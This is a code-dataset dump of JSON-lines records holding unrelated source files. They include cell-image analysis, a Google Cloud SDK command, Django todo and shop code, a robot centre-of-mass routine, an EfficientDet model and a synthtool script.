y_sample = dict_[m][1]\r\n angle_temp_list = angle_round(x_sample, y_sample, 65) # 第三个参数为圆的半径\r\n\r\n for i in range(1, 73):\r\n x1 = angle_temp_list[i - 1][0]\r\n y1 = angle_temp_list[i - 1][1]\r\n cx = x_sample\r\n cy = y_sample\r\n temp_list = pixel_between_two_points(cx, round(x1), cy, round(y1))\r\n\r\n ray_lenth = 0\r\n compare_distance_value = 0\r\n compare_color_value = 255\r\n color_hist = []\r\n # 单条射线的所有点,颜色深度的集合,找出前三名\r\n color_deep_rank = {}\r\n for m in range(0, len(temp_list)):\r\n x_temp = temp_list[m][0]\r\n y_temp = temp_list[m][1]\r\n\r\n single_lenth = cell_wall_ray_lenth(cx, cy, x_temp, y_temp)\r\n\r\n color_deep_rank[y_temp, x_temp] = gauss[y_temp][x_temp]\r\n\r\n sorted_color_deep_rank = sorted(color_deep_rank.items(), key=lambda kv: (kv[1], kv[0]), reverse=False)\r\n\r\n if gauss[y_temp][x_temp] <= compare_color_value:\r\n compare_color_value = gauss[y_temp][x_temp]\r\n compare_distance_valuevalue = single_lenth\r\n\r\n x_final = x_temp\r\n y_final = y_temp\r\n else:\r\n pass\r\n # ==hist graph\r\n color_hist.append(gauss[y_temp][x_temp])\r\n\r\n #print(\"**************** test: compare_color_value: \", compare_color_value, \"dic rank: \",sorted_color_deep_rank[0], sorted_color_deep_rank[1], sorted_color_deep_rank[2])\r\n # plt.plot(color_hist, color=\"black\")\r\n # plt.show()\r\n cv.circle(display, (round(x_final), round(y_final)), 1, (0, 0, 255), -1)\r\n # cv.circle(img, (round(sorted_color_deep_rank[1][0][1]), round(sorted_color_deep_rank[1][0][0])), 1, (0, 255, 255), -1)\r\n # cv.circle(img, (round(sorted_color_deep_rank[2][0][1]), round(sorted_color_deep_rank[2][0][0])), 1, (0, 255, 255), -1)\r\n fixed_data_list = un_angle_round(x_sample,y_sample,fixed_data)\r\n #print(fixed_data_list)\r\n cv.circle(display, (round(fixed_data_list[i-1][0]), round(fixed_data_list[i-1][1])), 1, (0, 255, 0), -1)\r\n #cv.circle(display, (round(x1), round(y1)), 1, (255, 0, 255), -1) # 半径显示\r\n\r\n # distance test and upload\r\n distance_from_single_point_to_center_list.append(distance(x_final, y_final, cx, cy))\r\n\r\n standard_r=math.ceil(mean(fixed_data))\r\n standard_error=0\r\n for i in range(0,72):\r\n standard_error+=abs(fixed_data[i]-standard_r)\r\n\r\n\r\n\r\n area_calculate_from_points(fixed_data_list)\r\n #holo_area_calculate_from_points(fixed_data_list,gray,200)\r\n\r\n plt.show()\r\n #mean of r\r\n cv.circle(display, (x_sample, y_sample), math.ceil(standard_r), (0, 255, 255), 0)\r\n #print(\"not circle degree is: \",format(((standard_error/72)/standard_r),'.2%'))\r\n #=========nucleus=======\r\n file1 = open('bin\\\\area_of_nucleus.txt', 'r')\r\n dataset1 = [float(x.strip()) for x in file1]\r\n file1.close()\r\n #print(\"The area of cell nucleus is: \",round(dataset1[cell_id-1]))\r\n\r\n cv.putText(display,\"Chromophobe Kidney Cancer Test\", (80, 30), cv.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 1)\r\n cv.putText(display, time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()), (80 , 60), cv.FONT_HERSHEY_SIMPLEX, 0.5,\r\n (0, 0, 0), 1)\r\n cv.putText(display, \"The area of this cell is:\"+str(area_calculate_from_points(fixed_data_list)), (80, (img.shape[1]-220)), cv.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 1)\r\n cv.putText(display, \"not circle degree is: \"+str(format(((standard_error/72)/standard_r),'.2%')), (80, img.shape[1]-200), cv.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 1)\r\n\r\n\r\n #cv.imshow(\"step4 output\", display)\r\n cv.imwrite(\"output_single\\\\\"+str(cell_id)+\".bmp\",display)\r\n #cv.waitKey()\r\n output1_non_circle_degree=(standard_error/72)/standard_r\r\n return (output1_non_circle_degree)\r\n","sub_path":"feature_4.py","file_name":"feature_4.py","file_ext":"py","file_size_in_byte":5332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"224376602","text":"# -*- coding: utf-8 -*- #\n# Copyright 2019 Google LLC. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Create command for the Label Manager - Label Values CLI.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.api_lib.labelmanager import service as labelmanager\nfrom googlecloudsdk.calliope import base\nfrom googlecloudsdk.command_lib.labelmanager import arguments\nfrom googlecloudsdk.command_lib.labelmanager import operations\nfrom googlecloudsdk.command_lib.labelmanager import utils\n\n\n@base.Hidden\n@base.ReleaseTracks(base.ReleaseTrack.ALPHA)\nclass Create(base.Command):\n \"\"\"Creates a LabelValue resource.\n\n Creates a LabelValue resource given the display name and description as\n well as details on the parent of the LabelValue. The parent of the\n LabelValue is always a LabelKey and the LabelKey's details can be passed as\n a numeric id or the display name along with the label-parent.\n \"\"\"\n\n detailed_help = {\n 'EXAMPLES':\n \"\"\"\n To create a LabelValue with the display name 'test' and the\n description 'description' under a LabelKey with display name 'env'\n under 'organizations/123', run:\n\n $ {command} test --label-key='env'\n --label-parent='organizations/123' --description='description'\n\n To create a LabelValue with the display name 'test' under LabelKey\n with id '456', run:\n\n $ {command} test --label-key='labelKeys/456'\n --description='description'\n \"\"\"\n }\n\n @staticmethod\n def Args(parser):\n group = parser.add_argument_group('LabelValue.', required=False)\n arguments.AddLabelParentArgToParser(\n group,\n required=False,\n message=(' --label-parent is required when using display name instead '\n 'of numeric id for the --label-key flag.'))\n arguments.AddDisplayNameArgToParser(group)\n arguments.AddLabelKeyArgToParser(group)\n arguments.AddDescriptionArgToParser(parser)\n arguments.AddAsyncArgToParser(parser)\n\n def Run(self, args):\n labelvalues_service = labelmanager.LabelValuesService()\n labelmanager_messages = labelmanager.LabelManagerMessages()\n\n if args.IsSpecified('label_parent'):\n label_key = utils.GetLabelKeyFromDisplayName(args.label_key,\n args.label_parent)\n else:\n label_key = args.label_key\n\n create_request = labelmanager_messages.LabelValue(\n displayName=args.DISPLAY_NAME,\n parent=label_key,\n description=args.description)\n op = labelvalues_service.Create(create_request)\n\n if args.async_:\n return op\n else:\n return operations.WaitForOperation(\n op,\n 'Waiting for LabelValue [{}] to be created with [{}]'.format(\n args.DISPLAY_NAME, op.name),\n service=labelvalues_service)\n","sub_path":"google-cloud-sdk/lib/surface/labelmanager/values/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"581683807","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render,get_object_or_404\nfrom django.http import HttpResponseRedirect\n\nfrom .models import Todo\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\n@login_required\ndef index(request):\n todos= Todo.objects.filter(author= request.user)[:10]\n context ={\n 'todos':todos\n }\n return render(request, 'index.html',context)\n\n@login_required\ndef details(request,id):\n todo = Todo.objects.get(id=id)\n\n context = {\n 'todo': todo\n }\n return render(request, 'details.html',context)\n\n@login_required\ndef add(request):\n if(request.method == 'POST'):\n author= request.user,\n title = request.POST['title']\n text = request.POST['text']\n\n todo =Todo(title=title, text=text,author= request.user)\n todo.save()\n\n return HttpResponseRedirect('/todos')\n else:\n return render(request, 'add.html')\n\n@login_required\ndef delete(request, id):\n if request.method == 'DELETE':\n entry = get_object_or_404(Todo, id=id)\n entry.delete()\n\n return HttpResponseRedirect('/todos')\n","sub_path":"todos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"248962119","text":"#Ne pas oublier de changer le module à importer\nfrom affichage_mot_texte import mon_programme\nimport sys\nimport io\n\n\n#liste des couples input/output\ninput_output=[\\\n(\"mathématiques\",\"mathématiques\"),\\\n(\"Deux mots\",\"Deux\\nmots\"),\\\n(\"maths info python exposant alpha fonction parabole equilateral orthogonal cercle isocèle\",\"maths\\ninfo\\npython\\nexposant\\nalpha\\nfonction\\nparabole\\nequilateral\\northogonal\\ncercle\\nisocèle\") \\\n]\n\n\n#message d'aide si besoin\nhelp=\"\"\n\n\n\ndef send_msg(channel, msg):\n print(\"TECHIO> message --channel \\\"{}\\\" \\\"{}\\\"\".format(channel, msg))\n\n\ndef success():\n send_msg(\"Tests validés\",\"Bravo !\")\n print(\"TECHIO> success true\")\n\n\ndef fail():\n print(\"TECHIO> success false\")\n \n\ndef test():\n try:\n for inp,outp in input_output:\n sauvegarde_stdout=sys.stdout\n sys.stdout=io.StringIO()\n mon_programme(inp)\n count1 = sys.stdout.getvalue()[:-1]\n sys.stdout=sauvegarde_stdout\n assert str(count1) == str(outp), \"En testant les valeurs '{}' le résultat obtenu est {} au lieu de {}\".format(str(inp),repr(str(count1)),repr(str(outp)))\n send_msg(\"Tests validés\",\"En testant les valeurs '{}' le résultat obtenu est bien :\".format(str(inp)))\n for mot in inp.split():\n send_msg(\"Tests validés\", mot )\n success()\n except AssertionError as e:\n fail()\n send_msg(\"Oops! \", e)\n if help:\n send_msg(\"Aide 💡\", help)\n\n\nif __name__ == \"__main__\": test()\n","sub_path":"python-project/Les_listes/affichage_mot_texte_Test.py","file_name":"affichage_mot_texte_Test.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"632360883","text":"# -*- coding: utf-8 -*-\nimport logging\nlog = logging.getLogger('shop.forms.shipping')\nfrom django import forms\nfrom django.utils.encoding import smart_unicode\nfrom cc.conf import coresettings\nfrom cc.core.middleware.user import get_current_user\nfrom cc.shop.middleware.checkout import get_current_address\nfrom cc.shop.middleware.basket import get_current_basket\nfrom cc.shop.models import CustomerAddress, PostageMethod\n\nclass PostageMethodForm(forms.Form):\n postage = forms.ModelChoiceField(PostageMethod.objects.none(), widget = forms.RadioSelect, required=True)\n \n def __init__(self, *args, **kwargs):\n try:\n self.address = kwargs.pop('address')\n except KeyError:\n self.address = False\n \n super(PostageMethodForm, self).__init__(*args, **kwargs)\n self.fields['postage'].queryset = PostageMethod.objects.all()\n \n def estimate_shipping(self):\n user = get_current_user()\n basket = get_current_basket()\n address = self.address or get_current_address()\n postage_methods = PostageMethod.objects.estimates(user, address)\n choices = []\n available_methods = []\n for s in postage_methods:\n estimate = s.method.model_class().estimate(s, basket, address)\n if estimate is not None:\n available_methods.append({'id' : s.id, 'title' : s.title, 'estimate' : estimate , 'description' : s.description})\n # sort accorging to price\n decorated_list = [(x['estimate'],x) for x in available_methods]\n decorated_list.sort()\n available_methods = [y for (x,y) in decorated_list]\n if len(available_methods) == 0 :\n available_methods.append({'id' : 0, 'title' : \"Standard Postage\", 'estimate' : coresettings.DEFAULT_POSTAGE_CHARGE , 'description' : \"Standard Postage\"})\n # return it all into one nice easy digestible choice\n for method in available_methods:\n choice = (method['id'], '%s%s : %s - %s' % (smart_unicode('£'), method['estimate'], method['title'], method['description']) )\n choices.append(choice)\n # \n self.fields['postage'].choices = choices\n return available_methods\n\n ","sub_path":"cc/shop/forms/postage.py","file_name":"postage.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"183003029","text":"import numpy as np\nfrom LowerHalfTrans import lowerHalfComTrans\nfrom UpperHalfTrans import UpperHalfComTrans\nfrom convertCod import *\ndef calcCom(ThetaL, ThetaU):\n #center of mass of different parts in local coordinates\n #reference http://doc.aldebaran.com/2-1/family/nao_h25/masses_h25_v4.html#h25-masses-v4\n ComTorso = np.array([-0.00413, 0, 0.04342])\n MTorso = 1.0496\n ComNeck = np.array([-10**(-5), 0, -0.02742])\n MNeck = 0.06442\n ComHead = np.array([-0.00112, 0, 0.05258])\n MHead = 0.60533\n ComRShoulder = np.array([-0.00165, 0.02663,0.00014])\n MRShoulder = 0.07504\n ComLShoulder = np.array([-0.00165, -0.02663,0.00014])\n MLShoulder = 0.07504\n ComRBiceps = np.array([0.02455, -0.00563, 0.0033])\n MRBiceps = 0.15777\n ComLBiceps = np.array([0.02455, 0.00563, 0.0033])\n MLBiceps = 0.15777\n ComRElbow = np.array([-0.02744, 0, -0.00014])\n MRElbow = 0.06483\n ComLElbow = np.array([-0.02744, 0, -0.00014])\n MLElbow = 0.06483\n ComRForeArm = np.array([0.02556, -0.00281, 0.00076])\n MRForeArm = 0.07761\n ComLForeArm = np.array([0.02556, 0.00281, 0.00076])\n MLForeArm = 0.07761\n ComRHand = np.array([0.03434, 0.00088, 0.00308])\n MRHand = 0.18533\n ComLHand = np.array([0.03434, -0.00088, 0.00308])\n MLHand = 0.18533\n ComRPelvis = np.array([-0.00781, 0.01114, 0.02661])\n MRPelvis = 0.06981\n ComLPelvis = np.array([-0.00781, -0.01114, 0.02661])\n MLPelvis = 0.06981\n ComRHip = np.array([-0.01549, -0.00029, -0.00515])\n MRHip = 0.13053\n ComLHip = np.array([-0.01549, 0.00029, -0.00515])\n MLHip = 0.13053\n ComRThigh = np.array([0.00138, -0.00221, -0.05373])\n MRThigh = 0.38968\n ComLThigh = np.array([0.00138, 0.00221, -0.05373])\n MLThigh = 0.38968\n ComRTibia = np.array([0.00453, -0.00225,-0.04936])\n MRTibia = 0.29142\n ComLTibia = np.array([0.00453, 0.00225,-0.04936])\n MLTibia = 0.29142\n ComRAnkle = np.array([0.00045, -0.00029, 0.00685])\n MRAnkle = 0.13416\n ComLAnkle = np.array([0.00045, 0.00029, 0.00685])\n MLAnkle = 0.13416\n ComRFeet = np.array([0.02542, -0.0033, -0.03239])\n MRFeet = 0.16184\n ComLFeet = np.array([0.02542, 0.0033, -0.03239])\n MLFeet = 0.16184\n\n #***************************************************8\n #Joint location\n JTorso = np.array([0,0,0])\n JHead = np.array([0,0,126.5])\n JLShoulder = np.array([0, 98, 100])\n JRShoulder = np.array([0,-98, 100])\n JLElbow = np.array([105, 15, 0]) + JLShoulder\n JRElbow = np.array([105, -15, 0]) + JRShoulder\n JLHand = np.array([55.95, 0, 0]) + JLElbow\n JRHand = np.array([55.95, 0, 0]) + JRElbow\n JLHip = np.array([0, 50, -85])\n JRHip = np.array([0,-50, -85])\n JLKnee = np.array([0, 0, -100]) + JLHip\n JRKnee = np.array([0, 0, -100]) + JRHip\n JLAnkle = np.array([0, 0, -102.9]) + JLKnee\n JRAnkle = np.array([0, 0, -102.9]) + JRKnee\n\n #Com of Upper body\n MU = MTorso + MNeck + MHead + MLShoulder + MRShoulder + MLBiceps + MRBiceps + MLElbow + MRElbow \\\n + MLForeArm + MRForeArm + MLHand + MRHand\n\n x = np.array([ComTorso+JTorso, ComNeck+JHead, ComHead+JHead, ComLShoulder+JTorso,\n ComRShoulder+JTorso, ComLBiceps + JLShoulder, ComRBiceps + JRShoulder,\n ComLElbow + JLShoulder, ComRElbow+JRShoulder, ComLForeArm + JLShoulder,\n ComRForeArm + JRShoulder, ComLHand + JLHand, ComRHand+JRHand,\n JLShoulder, JRShoulder, JLElbow, JRElbow])\n\n for i in range(np.size(x,0)):\n x[i] = convCod2book(x[i])\n\n x = UpperHalfComTrans(x, ThetaU)\n for i in range(np.size(x,0)):\n x[i] = convCod2doc(x[i])\n\n\n #fix upper body\n if 0:\n ComU = (ComTorso+JTorso)*MTorso/MU + (ComNeck + JHead)*MNeck/MU \\\n + (ComHead + JHead)*MHead/MU + (ComLShoulder + JTorso)*MLShoulder/MU \\\n + (ComRShoulder + JTorso)*MRShoulder/MU + (ComLBiceps + JLShoulder)*MLBiceps/MU \\\n + (ComRBiceps + JRShoulder)*MRBiceps/MU + (ComLElbow + JLShoulder)*MLElbow/MU \\\n + (ComRElbow + JRShoulder)*MRElbow/MU + (ComLForeArm + JLShoulder)*MLForeArm/MU \\\n + (ComRForeArm + JRShoulder)*MRForeArm/MU + (ComLHand + JLHand)*MLHand/MU \\\n +(ComRHand + JRHand)*MRHand/MU\n else:\n ComU = x[0]*MTorso/MU + x[1]*MNeck/MU \\\n + x[2]*MHead/MU + x[3]*MLShoulder/MU \\\n + x[4]*MRShoulder/MU + x[5]*MLBiceps/MU \\\n + x[6]*MRBiceps/MU + x[7]*MLElbow/MU \\\n + x[8]*MRElbow/MU + x[9]*MLForeArm/MU \\\n + x[10]*MRForeArm/MU + x[11]*MLHand/MU \\\n + x[12]*MRHand/MU\n\n print('Com of upper body: ', ComU)\n MU = np.array([MU])\n\n #Com of lower half\n ML = MLPelvis + MRPelvis + MLHip + MRHip + MLThigh + MRThigh + MLTibia + MRTibia + MLAnkle + MRAnkle\\\n + MLFeet + MRFeet\n\n #ComL = (ComLPelvis + JLHip)*MLPelvis/ML + (ComRPelvis + JRHip)*MRPelvis/ML\\\n #+(ComLHip + JLHip)*MLHip/ML + (ComRHip + JRHip)*MRHip/ML + (ComLThigh + JLHip)*MLThigh/ML \\\n #+(ComRThigh + JRHip)*MRThigh/ML + (ComLTibia + JLKnee)*MLTibia/ML + (ComRTibia + JRKnee)*MRTibia/ML \\\n #+(ComLAnkle + JLKnee)*MLAnkle/ML + (ComRAnkle + JRKnee)*MRAnkle/ML + (ComLFeet + JLAnkle)*MLFeet/ML \\\n #+(ComRFeet + JRAnkle)*MRFeet/ML\n\n #x[0]:RPelvis, x[1]:LPevis, x[2]:RHip, x[3]:LHip,x[4]:RThigh, x[5]:LThigh --> Hip\n #x[6]:RTibia, x[7]:LTibia, x[8]:RAnkle, x[9]:LAnkle --> Knee\n #x[10]:RFoot, x[11]:LFoot --> Ankle (Knee instead for convenience)\n #x[12] --> x1(LHip), x[13] --> x2(RKnee), x[14] --> x3(LKnee)\n x = np.array([ComRPelvis + JRHip, ComLPelvis + JLHip, ComRHip + JRHip, ComLHip + JLHip, ComRThigh + JRHip \\\n , ComLThigh + JLHip, ComLTibia + JLKnee, ComRTibia + JRKnee, ComRAnkle + JRKnee, \\\n ComLAnkle + JLKnee, ComRFeet + JRAnkle, ComLFeet + JLAnkle, JLHip, JRKnee, JLKnee])\n\n x2 = x\n for i in range(np.size(x,0)):\n x[i] = convCod2book(x[i])\n\n x = lowerHalfComTrans(x, ThetaL)\n for i in range(np.size(x,0)):\n x[i] = convCod2doc(x[i])\n\n\n ComL = x[1]*MLPelvis/ML + x[0]*MRPelvis/ML\\\n +x[3]*MLHip/ML + x[2]*MRHip/ML + x[5]*MLThigh/ML \\\n +x[4]*MRThigh/ML + x[7]*MLTibia/ML + x[6]*MRTibia/ML \\\n +x[9]*MLAnkle/ML + x[8]*MRAnkle/ML + x[11]*MLFeet/ML \\\n +x[10]*MRFeet/ML\n\n M = ML + MU\n Com = ComU*MU/M + ComL*ML/M\n\n return np.concatenate((Com,M))\n\n#test function\n#a = calcCom(np.array([0,0,0,0,0,0])\n#print(a)\n\n\n","sub_path":"nao_virtual_ws/src/nao_virtual/nao_control/scripts/calcCoM.py","file_name":"calcCoM.py","file_ext":"py","file_size_in_byte":6413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"581375403","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom copy import deepcopy\nfrom typing import Any, Dict, List, Optional\n\nimport torch\nimport torch.nn as nn\nfrom torch import Tensor\n\nfrom combustion.nn import BiFPN1d, BiFPN2d, BiFPN3d, MatchShapes, MobileNetBlockConfig\n\nfrom .efficientnet import _EfficientNet\n\n\nclass _EfficientDetMeta(type):\n def __new__(cls, name, bases, dct):\n x = super().__new__(cls, name, bases, dct)\n if \"3d\" in name:\n x.Conv = nn.Conv3d\n x.BatchNorm = nn.BatchNorm3d\n x.BiFPN = BiFPN3d\n x._get_blocks = MobileNetBlockConfig.get_3d_blocks\n elif \"2d\" in name:\n x.Conv = nn.Conv2d\n x.BatchNorm = nn.BatchNorm2d\n x.BiFPN = BiFPN2d\n x._get_blocks = MobileNetBlockConfig.get_2d_blocks\n elif \"1d\" in name:\n x.Conv = nn.Conv1d\n x.BatchNorm = nn.BatchNorm1d\n x.BiFPN = BiFPN1d\n x._get_blocks = MobileNetBlockConfig.get_1d_blocks\n else:\n raise RuntimeError(f\"Metaclass: error processing name {cls.__name__}\")\n return x\n\n\nclass _EfficientDet(_EfficientNet):\n __constants__ = [\"fpn_levels\"]\n\n def __init__(\n self,\n block_configs: List[MobileNetBlockConfig],\n fpn_levels: List[int] = [3, 5, 7, 8, 9],\n fpn_filters: int = 64,\n fpn_repeats: int = 3,\n width_coeff: float = 1.0,\n depth_coeff: float = 1.0,\n width_divisor: float = 8.0,\n min_width: Optional[int] = None,\n stem: Optional[nn.Module] = None,\n head: Optional[nn.Module] = None,\n fpn_kwargs: dict = {},\n ):\n super(_EfficientDet, self).__init__(\n block_configs, width_coeff, depth_coeff, width_divisor, min_width, stem, head\n )\n self.fpn_levels = fpn_levels\n\n # convolutions mapping backbone feature maps to constant number of channels\n fpn_convs = []\n output_filters = self.round_filters(fpn_filters, 1.0, width_divisor, min_width)\n self.__fpn_filters = output_filters\n for i, config in enumerate(self.block_configs):\n if i + 1 in fpn_levels:\n input_filters = config.output_filters\n conv = self.Conv(input_filters, output_filters, kernel_size=1)\n fpn_convs.append(conv)\n\n for i in fpn_levels:\n if i == len(self.block_configs) + 1:\n input_filters = self.block_configs[-1].output_filters\n conv = self.Conv(input_filters, output_filters, kernel_size=3, stride=2, padding=1)\n fpn_convs.append(conv)\n elif i > len(self.block_configs) + 1:\n input_filters = output_filters\n conv = self.Conv(input_filters, output_filters, kernel_size=3, stride=2, padding=1)\n fpn_convs.append(nn.Sequential(nn.ReLU(), conv))\n\n self.fpn_convs = nn.ModuleList(fpn_convs)\n\n self.match = MatchShapes()\n\n # defaults for batch norm params\n _ = {\"bn_momentum\": 0.01, \"bn_epsilon\": 1e-3}\n _.update(fpn_kwargs)\n fpn_kwargs = _\n\n # build bifpn\n bifpn_layers = []\n for i in range(fpn_repeats):\n bifpn = self.BiFPN(output_filters, levels=len(fpn_levels), **fpn_kwargs)\n bifpn_layers.append(bifpn)\n self.bifpn_layers = nn.ModuleList(bifpn_layers)\n\n @torch.jit.unused\n @property\n def fpn_filters(self) -> int:\n r\"\"\"Number of filters in each level of the BiFPN. When using a custom head, use this\n property to determine the number of filters in the head's input.\n \"\"\"\n return self.__fpn_filters\n\n def extract_features(self, inputs: Tensor) -> List[Tensor]:\n r\"\"\"Runs the EfficientDet stem and body to extract features, returning a list of\n tensors representing features extracted from each block.\n\n Args:\n\n inputs (:class:`torch.Tensor`):\n Model inputs\n\n \"\"\"\n # efficientnet feature extractor\n backbone_features: List[Tensor] = []\n x = self.stem(inputs)\n prev_x = x\n for block in self.blocks:\n x = block(prev_x)\n backbone_features.append(x)\n prev_x = x\n\n # pull out feature maps to be used in BiFPN\n captured_features: List[Tensor] = []\n\n for i in self.fpn_levels:\n if i - 1 < len(backbone_features):\n captured_features.append(backbone_features[i - 1])\n\n # map to constant channel number using trivial convs\n for i, conv in enumerate(self.fpn_convs):\n if i < len(captured_features):\n captured_features[i] = conv(captured_features[i])\n else:\n prev_x = conv(prev_x)\n captured_features.append(prev_x)\n\n for bifpn in self.bifpn_layers:\n captured_features = bifpn(captured_features)\n\n return captured_features\n\n def forward(self, inputs: Tensor) -> List[Tensor]:\n r\"\"\"Runs the entire EfficientDet model, including stem, body, and head.\n If no head was supplied, the output of :func:`extract_features` will be returned.\n Otherwise, the output of the given head will be returned.\n\n .. note::\n The returned output will always be a list of tensors. If a custom head is given\n and it returns a single tensor, that tensor will be wrapped in a list before\n being returned.\n\n Args:\n inputs (:class:`torch.Tensor`):\n Model inputs\n \"\"\"\n output = self.extract_features(inputs)\n if self.head is not None:\n output = self.head(output)\n if not isinstance(output, list):\n output = [\n output,\n ]\n\n return output\n\n @classmethod\n def from_predefined(cls, compound_coeff: int, block_overrides: Dict[str, Any] = {}, **kwargs) -> \"_EfficientDet\":\n r\"\"\"Creates an EfficientDet model using one of the parameterizations defined in the\n `EfficientDet paper`_.\n\n Args:\n compound_coeff (int):\n Compound scaling parameter :math:`\\phi`. For example, to construct EfficientDet-D0, set\n ``compound_coeff=0``.\n\n block_overrides (dict):\n Overrides to be applied to each :class:`combustion.nn.MobileNetBlockConfig`.\n\n **kwargs:\n Additional parameters/overrides for model constructor.\n\n .. _EfficientNet paper:\n https://arxiv.org/abs/1905.11946\n \"\"\"\n # from paper\n alpha = 1.2\n beta = 1.1\n width_divisor = 8.0\n\n depth_coeff = alpha ** compound_coeff\n width_coeff = beta ** compound_coeff\n\n fpn_filters = int(64 * 1.35 ** compound_coeff)\n fpn_repeats = 3 + compound_coeff\n fpn_levels = [3, 5, 7, 8, 9]\n\n # apply config overrides at each block\n block_configs = deepcopy(cls.DEFAULT_BLOCKS)\n for k, v in block_overrides.items():\n for config in block_configs:\n setattr(config, str(k), v)\n\n final_kwargs = {\n \"block_configs\": block_configs,\n \"width_coeff\": width_coeff,\n \"depth_coeff\": depth_coeff,\n \"width_divisor\": width_divisor,\n \"fpn_filters\": fpn_filters,\n \"fpn_repeats\": fpn_repeats,\n \"fpn_levels\": fpn_levels,\n }\n final_kwargs.update(kwargs)\n result = cls(**final_kwargs)\n result.compound_coeff = compound_coeff\n return result\n\n\nclass EfficientDet1d(_EfficientDet, metaclass=_EfficientDetMeta):\n pass\n\n\nclass EfficientDet2d(_EfficientDet, metaclass=_EfficientDetMeta):\n r\"\"\"Implementation of EfficientDet as described in the `EfficientDet paper`_.\n EfficientDet is built on an EfficientNet backbone\n (see :class:`combustion.models.EfficientNet2d` for details). EfficientDet adds a\n bidirectional feature pyramid network (see :class:`combustion.nn.BiFPN2d`), which\n mixes information across the various feature maps produced by the EfficientNet backbone.\n\n .. image:: ./efficientdet.png\n :width: 800px\n :align: center\n :height: 300px\n :alt: Diagram of EfficientDet\n\n The authors of EfficientDet used the default EfficientNet scaling parameters for the backbone:\n\n .. math::\n \\alpha = 1.2 \\\\\n \\beta = 1.1 \\\\\n \\gamma = 1.15\n\n\n The BiFPN was scaled as follows:\n\n .. math::\n W_\\text{bifpn} = 64 \\cdot \\big(1.35^\\phi\\big) \\\\\n D_\\text{bifpn} = 3 + \\phi\n\n In the original EfficientDet implementation, the authors extract feature maps from levels\n 3, 5, and 7 of the backbone. Two additional coarse levels are created by performing additional\n strided convolutions to the final level in the backbone, for a total of 5 levels in the BiFPN.\n\n .. note::\n Currently, DropConnect ratios are not scaled based on depth of the given block.\n This is a deviation from the true EfficientNet implementation.\n\n Args:\n block_configs (list of :class:`combustion.nn.MobileNetBlockConfig`)\n Configs for each of the :class:`combustion.nn.MobileNetConvBlock2d` blocks\n used in the model.\n\n fpn_levels (list of ints):\n Indicies of EfficientNet feature levels to include in the BiFPN, starting at index 1.\n Values in ``fpn_levels`` greater than the total number of blocks in the backbone denote\n levels that should be created by applying additional strided convolutions to the final\n level in the backbone.\n\n fpn_filters (int):\n Number of filters to use for the BiFPN. The filter count given here should be the desired\n number of filters after width scaling.\n\n fpn_repeats (int):\n Number of repeats to use for the BiFPN. The repeat count given here should be the desired\n number of repeats after depth scaling.\n\n width_coeff (float):\n The width scaling coefficient. Increasing this increases the width of the model.\n\n depth_coeff (float):\n The depth scaling coefficient. Increasing this increases the depth of the model.\n\n width_divisor (float):\n Used in calculating number of filters under width scaling. Filters at each block\n will be a multiple of ``width_divisor``.\n\n min_width (int):\n The minimum width of the model at any block\n\n stem (:class:`torch.nn.Module`):\n An optional stem to use for the model. The default stem is a single\n 3x3/2 conolution that expects 3 input channels.\n\n head (:class:`torch.nn.Module`):\n An optional head to use for the model. By default, no head will be used\n and ``forward`` will return a list of tensors containing extracted features.\n\n fpn_kwargs (dict):\n Keyword args to be passed to all :class:`combustion.nn.BiFPN2d` layers.\n\n Shapes\n * Input: :math:`(N, C, H, W)`\n * Output: List of tensors of shape :math:`(N, C, H', W')`, where height and width vary\n depending on the amount of downsampling for that feature map.\n\n .. _EfficientDet paper:\n https://arxiv.org/abs/1911.09070\n \"\"\"\n\n\nclass EfficientDet3d(_EfficientDet, metaclass=_EfficientDetMeta):\n pass\n","sub_path":"src/combustion/models/efficientdet.py","file_name":"efficientdet.py","file_ext":"py","file_size_in_byte":11419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"316820532","text":"import synthtool as s\nimport synthtool.gcp as gcp\nimport synthtool.languages.node as node\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\nAUTOSYNTH_MULTIPLE_COMMITS = True\n\n\ngapic = gcp.GAPICBazel()\nversions = ['v1', 'v1beta2']\nfor version in versions:\n library = gapic.node_library(\n 'language',\n version,\n )\n s.copy(\n library,\n excludes=['package.json', 'README.md'])\n\n# Update common templates\ncommon_templates = gcp.CommonTemplates()\ntemplates = common_templates.node_library(\n source_location='build/src', versions=versions, default_version='v1')\ns.copy(templates)\n\nnode.postprocess_gapic_library()\n","sub_path":"synth.py","file_name":"synth.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"447087706","text":"# Author: Izaak Neutelings (May 2018)\n# 